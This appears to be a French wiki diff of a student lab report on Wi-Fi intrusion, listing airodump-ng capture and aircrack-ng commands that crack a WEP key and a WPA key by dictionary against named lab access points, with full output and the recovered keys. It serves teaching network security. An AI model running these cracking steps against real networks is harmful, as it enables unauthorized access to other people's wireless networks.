« Atelier SysRes SE4 2025/2026 E6 » : différence entre les versions
Aller à la navigation
Aller à la recherche
(Page créée avec « === Effraction WIFI === <syntaxhighlight lang="bash"> sudo airodump-ng wlan1 </syntaxhighlight>On trouve cracotte06 avec son adresse et son chanel<syntaxhighlight lang="bash"> sudo airodump-ng wlan1 --write dump --bssid 04:DA:D2:9C:50:55 -c4 </syntaxhighlight>Le fichier dump étant crée, on récupère la clé avec la commande suivante :<syntaxhighlight lang="bash"> sudo aircrack-ng -b 04:DA:D2:9C:50:55 dump-22.cap </syntaxhighlight><syntaxhighlight lang="bash"... ») |
Aucun résumé des modifications |
||
| Ligne 22 : | Ligne 22 : | ||
KEY FOUND! [ FF:FF:FF:FF:FA:BC:07:CB:AE:EE:EE:EE:EE ] | KEY FOUND! [ FF:FF:FF:FF:FA:BC:07:CB:AE:EE:EE:EE:EE ] | ||
Decrypted correctly: 100% | Decrypted correctly: 100% | ||
</syntaxhighlight><syntaxhighlight lang="bash"> | |||
sudo airodump-ng wlan1 --write dump --bssid 44:AD:D9:5F:87:05 -c13 | |||
</syntaxhighlight><syntaxhighlight lang="bash"> | |||
sudo aircrack-ng -a2 -w dico.txt -b 44:AD:D9:5F:87:05 dump-23.cap | |||
</syntaxhighlight><syntaxhighlight lang="bash"> | |||
Aircrack-ng 1.7 | |||
[00:28:29] 66973408/100000000 keys tested (39839.22 k/s) | |||
Time left: 13 minutes, 48 seconds 66.97% | |||
KEY FOUND! [ 66684666 ] | |||
Master Key : 63 5F 7F 36 2C 70 49 04 6A 29 11 FE C8 C1 0C FD | |||
4D 16 18 BE C9 48 70 31 C5 7B 13 BD E1 02 8A 15 | |||
Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | |||
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | |||
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | |||
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | |||
EAPOL HMAC : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | |||
</syntaxhighlight> | </syntaxhighlight> | ||
Version actuelle datée du 10 février 2026 à 16:16
Effraction WIFI
sudo airodump-ng wlan1
On trouve cracotte06 avec son adresse et son chanel
sudo airodump-ng wlan1 --write dump --bssid 04:DA:D2:9C:50:55 -c4
Le fichier dump étant crée, on récupère la clé avec la commande suivante :
sudo aircrack-ng -b 04:DA:D2:9C:50:55 dump-22.cap
Aircrack-ng 1.7
[00:00:00] Tested 525 keys (got 63977 IVs)
KB depth byte(vote)
0 1/ 2 20(74752) 5B(73216) F0(73216) 1E(72704) 77(72192) 12(71936) 78(71936) ED(71936) 21(71680) EF(71680) 58(71424) AE(71424) 4D(71168) 5A(70656) 02(70400)
1 5/ 1 48(74496) DA(71936) 47(71680) 55(71680) B9(71168) BD(70656) DE(70656) 01(70400) 77(70400) A2(70400) 6C(70144) 74(70144) 7C(70144) 8E(70144) 92(70144)
2 73/ 2 CE(66560) CC(66304) E2(66304) DD(66048) ED(66048) 69(65536) 97(65536) A7(65536) AC(65536) B8(65536) 44(65280) 72(65280) D7(65280) EA(65280) F4(65280)
3 7/ 11 5C(73984) 14(72960) 6E(72960) E8(72448) 00(71424) EB(71424) 04(71168) 23(70912) 35(70912) AB(70912) 58(70656) 1B(70400) CA(70400) D4(70400) FE(70400)
4 0/ 3 F6(92416) 2D(73472) 30(72704) 6A(71680) 9D(71680) BD(71680) C9(71680) 2B(71168) 3D(70400) 52(70400) C8(70400) D8(70400) 49(70144) F8(70144) FE(69632)
KEY FOUND! [ FF:FF:FF:FF:FA:BC:07:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
sudo airodump-ng wlan1 --write dump --bssid 44:AD:D9:5F:87:05 -c13
sudo aircrack-ng -a2 -w dico.txt -b 44:AD:D9:5F:87:05 dump-23.cap
Aircrack-ng 1.7
[00:28:29] 66973408/100000000 keys tested (39839.22 k/s)
Time left: 13 minutes, 48 seconds 66.97%
KEY FOUND! [ 66684666 ]
Master Key : 63 5F 7F 36 2C 70 49 04 6A 29 11 FE C8 C1 0C FD
4D 16 18 BE C9 48 70 31 C5 7B 13 BD E1 02 8A 15
Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
EAPOL HMAC : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00